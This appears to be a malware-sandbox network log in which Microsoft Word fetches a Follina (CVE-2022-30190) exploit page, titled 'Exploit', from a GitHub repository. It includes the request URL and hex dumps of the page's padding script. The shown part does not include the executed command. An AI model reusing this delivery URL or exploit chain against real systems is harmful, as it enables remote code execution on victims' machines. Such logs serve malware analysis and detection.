                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC104INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC105INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        12192.168.2.449716185.199.109.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:12 UTC107OUTHEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2022-08-18 01:57:12 UTC107INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:12 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6942-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                        X-Timer: S1660787833.802035,VS0,VE1
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 171bdafc3cc43db5bb8271a13736edb38baa21b4
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:12 GMT
                                                                                                                                                                                                                                        Source-Age: 7


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        2192.168.2.449706185.199.108.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC55OUTOPTIONS /drgreenthumb93/CVE-2022-30190-follina/ HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                                                        X-Office-Major-Version: 16
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-FeatureVersion: 1
                                                                                                                                                                                                                                        X-MSGETWEBURL: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC56INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:08 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6942-MXP
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                        X-Timer: S1660787829.961872,VS0,VE9
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 1e438572101bdeafcc9fe390762dd85dc0c41b96
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:08 GMT
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding
                                                                                                                                                                                                                                        transfer-encoding: chunked
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC56INData Raw: 34 32 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 42a
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC56INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 0d 0a 0d 0a 48 65 6c 6c 6f 20 66 75 74 75 72 65 20 47 69 74 48 75 62 62 65 72 21 20 49 20 62 65 74 20 79 6f 75 27 72 65 20 68 65 72 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 6f 73 65 20 6e 61 73 74 79 20 69 6e 6c 69 6e 65 20 73 74 79 6c 65 73 2c 0d 0a 44 52 59 20 75 70 20 74 68 65 73 65 20 74 65 6d 70 6c 61 74 65 73 20 61 6e 64 20 6d 61 6b 65 20 27 65 6d 20 6e 69 63 65 20 61 6e 64 20 72 65 2d 75 73 61 62 6c 65 2c 20 72 69 67 68 74 3f 0d 0a 0d 0a 50 6c 65 61 73 65 2c 20 64 6f 6e 27 74 2e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 79 6c 65 67 75 69 64 65 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2e 30 0d 0a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...Hello future GitHubber! I bet you're here to remove those nasty inline styles,DRY up these templates and make 'em nice and re-usable, right?Please, don't. https://github.com/styleguide/templates/2.0--><html> <head>
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC57INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC57INData Raw: 31 35 36 38 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1568
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC57INData Raw: 6f 67 6f 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 35 70 78 3b 20 7d 0d 0a 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 32 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 0d 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0d 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 6d 69 6e 2d 2d 6d 6f 7a 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0d 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 2d 6f 2d 6d
                                                                                                                                                                                                                                        Data Ascii: ogo { display: inline-block; margin-top: 35px; } .logo-img-2x { display: none; } @media only screen and (-webkit-min-device-pixel-ratio: 2), only screen and ( min--moz-device-pixel-ratio: 2), only screen and ( -o-m
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC59INData Raw: 4f 46 52 76 45 35 46 75 4f 50 53 34 57 4c 53 74 37 2b 38 61 6a 76 58 63 4a 70 63 79 4e 76 68 7a 74 53 77 55 6b 54 47 67 5a 7a 39 75 44 53 78 52 6e 50 5a 77 73 6e 54 6b 71 79 37 6a 70 73 50 74 2f 41 78 79 76 6e 41 65 4a 4d 41 78 50 6e 4d 69 71 50 4a 59 49 79 7a 66 34 2f 4b 71 72 50 65 64 61 4b 35 62 49 73 51 77 66 54 6f 32 74 37 32 68 55 65 70 50 57 76 6e 36 6d 4f 38 56 6f 58 72 67 62 44 52 61 4a 58 6c 65 36 72 37 35 46 7a 5a 6d 37 53 32 54 6e 79 54 4e 55 58 76 35 65 69 44 41 41 36 6a 30 57 6d 4b 79 57 76 35 31 6c 69 52 41 41 43 6a 50 30 4f 5a 4e 56 75 77 61 34 4c 2b 75 51 41 63 77 2f 53 69 4e 47 48 35 37 6d 49 78 78 50 4b 6d 55 33 44 67 70 4c 32 73 58 33 72 75 74 63 33 2f 76 68 39 67 75 31 44 33 74 4e 45 41 74 76 4f 53 4b 56 41 6d 78 66 61 67 52 6d 62 6e
                                                                                                                                                                                                                                        Data Ascii: OFRvE5FuOPS4WLSt7+8ajvXcJpcyNvhztSwUkTGgZz9uDSxRnPZwsnTkqy7jpsPt/AxyvnAeJMAxPnMiqPJYIyzf4/KqrPedaK5bIsQwfTo2t72hUepPWvn6mO8VoXrgbDRaJXle6r75FzZm7S2TnyTNUXv5eiDAA6j0WmKyWv51liRAACjP0OZNVuwa4L+uQAcw/SiNGH57mIxxPKmU3DgpL2sX3rutc3/vh9gu1D3tNEAtvOSKVAmxfagRmbn
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC60INData Raw: 72 36 57 31 6b 54 53 63 51 70 46 6a 50 78 4b 4f 77 44 67 41 49 55 7a 79 7a 51 4f 51 52 59 4d 79 64 6b 7a 49 37 59 5a 62 69 64 44 6b 63 54 6b 55 4b 51 57 61 7a 4f 65 69 74 58 46 39 68 42 77 35 53 5a 63 69 5a 4f 69 39 54 36 47 6e 6b 4d 70 30 75 4b 79 6d 51 6b 44 48 48 41 78 7a 4d 4c 77 63 53 4d 2b 65 5a 4a 71 57 68 73 6b 68 4f 4d 69 76 44 44 73 63 49 43 35 6f 68 79 57 2b 78 31 6c 54 6d 35 36 2b 76 32 44 6b 47 47 6c 7a 39 46 53 45 6e 79 6e 52 64 67 50 4b 55 6c 65 7a 54 43 53 54 65 34 7a 47 6e 5a 66 73 56 74 6d 57 54 33 34 6b 6c 6a 41 6d 4a 67 41 62 42 53 45 75 59 79 51 49 6a 4c 6e 67 6e 6b 4c 42 55 67 6b 4a 46 59 36 50 64 62 67 63 4b 61 45 78 54 66 7a 34 38 46 6e 78 61 61 6e 78 38 66 47 70 36 68 6c 59 31 66 76 63 55 37 70 38 53 53 45 59 32 38 38 4e 41 6e 50
                                                                                                                                                                                                                                        Data Ascii: r6W1kTScQpFjPxKOwDgAIUzyzQOQRYMydkzI7YZbidDkcTkUKQWazOeitXF9hBw5SZciZOi9T6GnkMp0uKymQkDHHAxzMLwcSM+eZJqWhskhOMivDDscIC5ohyW+x1lTm56+v2DkGGlz9FSEnynRdgPKUlezTCSTe4zGnZfsVtmWT34kljAmJgAbBSEuYyQIjLngnkLBUgkJFY6PdbgcKaExTfz48Fnxaanx8fGp6hlY1fvcU7p8SSEY288NAnP
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC61INData Raw: 4d 32 65 2b 37 31 46 64 32 4b 66 48 4a 42 34 32 73 76 46 77 7a 70 4b 67 41 7a 45 4e 56 6e 59 52 37 2f 64 62 68 7a 49 79 66 4e 64 61 7a 43 4b 42 30 52 70 37 38 35 4a 41 34 71 39 73 57 4c 39 2b 73 70 4b 69 35 65 68 66 76 52 62 30 63 46 76 72 4b 30 4a 34 75 2b 64 33 70 6d 56 47 52 6c 77 31 73 47 38 70 74 37 61 6b 75 70 67 30 4b 6b 45 5a 73 5a 2f 66 39 45 64 65 61 38 42 68 43 51 79 33 37 69 41 70 43 69 43 52 2f 33 4b 4d 56 31 49 5a 79 64 32 56 2b 73 6c 79 59 6e 34 45 61 30 48 56 35 4d 69 4e 77 61 7a 52 6c 67 53 55 6d 58 42 41 79 34 72 66 56 71 42 34 4c 2b 76 53 49 36 53 38 71 34 43 32 2f 77 61 68 42 4b 2f 4a 79 48 39 2b 2f 4a 62 77 6a 6d 68 55 68 63 34 68 4d 39 4b 54 6b 65 45 64 5a 6f 35 6a 36 70 6a 34 77 77 6b 33 34 71 4b 4a 42 70 48 52 61 55 5a 67 7a 2f 34
                                                                                                                                                                                                                                        Data Ascii: M2e+71Fd2KfHJB42svFwzpKgAzENVnYR7/dbhzIyfNdazCKB0Rp785JA4q9sWL9+spKi5ehfvRb0cFvrK0J4u+d3pmVGRlw1sG8pt7akupg0KkEZsZ/f9Edea8BhCQy37iApCiCR/3KMV1IZyd2V+slyYn4Ea0HV5MiNwazRlgSUmXBAy4rfVqB4L+vSI6S8q4C2/wahBK/JyH9+/JbwjmhUhc4hM9KTkeEdZo5j6pj4wwk34qKJBpHRaUZgz/4
                                                                                                                                                                                                                                        2022-08-18 01:57:08 UTC63INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        3192.168.2.449707185.199.109.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC63OUTGET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC63INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 8226
                                                                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        ETag: "e354a911960708e3440f84ea636df58339a30e9db3fd96e7dc79f2ba014824d1"
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:51884D:55A9F9:62FD9C75
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:09 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6964-MXP
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                        X-Timer: S1660787829.123418,VS0,VE156
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 9ad2f308e82a21251073574645c4eeecda18469e
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:09 GMT
                                                                                                                                                                                                                                        Source-Age: 0
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC64INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 45 78 70 6c 6f 69 74 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42
                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html lang="en"><head><title>Exploit</title></head><body><script>//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV//BBBBBBBBB
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC65INData Raw: 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: BBBBBBBBBBDVDVDV//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC67INData Raw: 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC68INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC69INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC71INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        4192.168.2.449708185.199.109.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC72OUTHEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Authorization: Bearer
